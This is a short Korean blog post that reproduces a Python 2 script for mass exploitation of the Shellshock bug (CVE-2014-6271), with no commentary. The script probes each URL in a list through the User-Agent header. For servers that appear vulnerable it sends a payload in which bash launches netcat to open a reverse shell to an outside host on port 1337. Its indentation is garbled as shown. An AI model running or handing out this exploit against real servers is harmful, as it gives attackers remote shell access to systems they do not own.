본문 바로가기
2. Information Security/5. Vulnerabilities

3. CVE-2014-6271 (ShellShock)

by H232C 2020. 6. 9. 
#Title: Shell Shock Auto Exploitation Script
# Author: Rafay Baloch


import requests,sys

if (len(sys.argv) < 2):
print "Usage: shocktest.py file.txt"
exit(0)

def main():
 file = sys.argv[1]
 with open(file) as f:
file = f.read().splitlines()
for url in file:
cmd="() { test;};/bin/nopatchobfu"
headers = {'user-agent': cmd}
    r=requests.get(url, headers=headers)
if r.status_code == 500:
print url,"is Vulnerable"
print "Exploting.."
exp = '() { :; }; /bin/bash -c "nc -v 1.0.0.1 1337 -e /bin/bash -i"'
head = {'user-agent':exp}
r=requests.get(url, headers=head)
elif r.status_code:
print url, "is not Vulnerable"

if __name__ == "__main__":
main()
저작자표시

'2. Information Security > 5. Vulnerabilities' 카테고리의 다른 글

2. CVE-2014-0160 (Heartbleed)  (0) 2020.06.09
1. CVE-2017-1278 (Aapache Struts)  (0) 2020.06.09

관련글

댓글

티스토리툴바